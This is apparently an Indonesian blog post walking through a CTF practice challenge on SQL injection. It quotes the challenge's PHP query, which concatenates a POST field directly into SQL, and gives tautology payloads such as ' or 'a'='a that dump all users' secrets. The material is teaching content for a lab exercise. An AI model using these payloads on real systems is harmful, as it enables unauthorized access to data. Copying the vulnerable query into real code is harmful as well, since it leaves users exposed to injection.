Assalamualaikum Wr.Wb...
dengan diberikan nikmat dan rezeki dari Allah SWT, saya Mr.GagalTotal666 akan
berbagi kepada anda tentang soal latihan CTFS.me yaitu soal SQLi Lv.1.
sebagai berikut contoh soal latihan SQLi Lv.1 CFTS.me
link soal : [http://35.184.20.243:8003/level1.php]
My friend created a website where we can store secrets... Unfortunately,
we can only see our own. Help me find all of my friend's secrets.
berikut contoh soal lain nya tentang SQLi [http://35.184.20.243:8003/]
oke lanjut di soal bagian level 1
perhatikan di source code yang terdapat di query
if (isset($_POST['session_id'])) {
$query = "SELECT * FROM secrets WHERE session_id = '" . $_POST['session_id'] . "'";
$result = $conn->query($query);
} else {
$query = "SELECT * FROM secrets WHERE session_id = '" . session_id() . "'";
$result = $conn->query($query);
}
cara nya gampang tinggal di bypass SQL, contoh payload seperti ini
$ ' or 'a'='a
sebenarnya tidak harus seperti contoh saya ini, kreasi anda sendiri ^_^
pasti tau lah bypass SQL contoh sederhana 1'or'1='
oke lanjut.., masukan payload di session id terus klik get your secrets
seperti ini dan Flag pun dapat
mudah kan ? ^_^ mungkin itu saja yang bisa saya berbagi tentang
soal latihan CTFS.me SQLi Lv.1
sekian dan semoga bermanfaat ....
Wassalamualaikum Wr.Wb...
0 Comments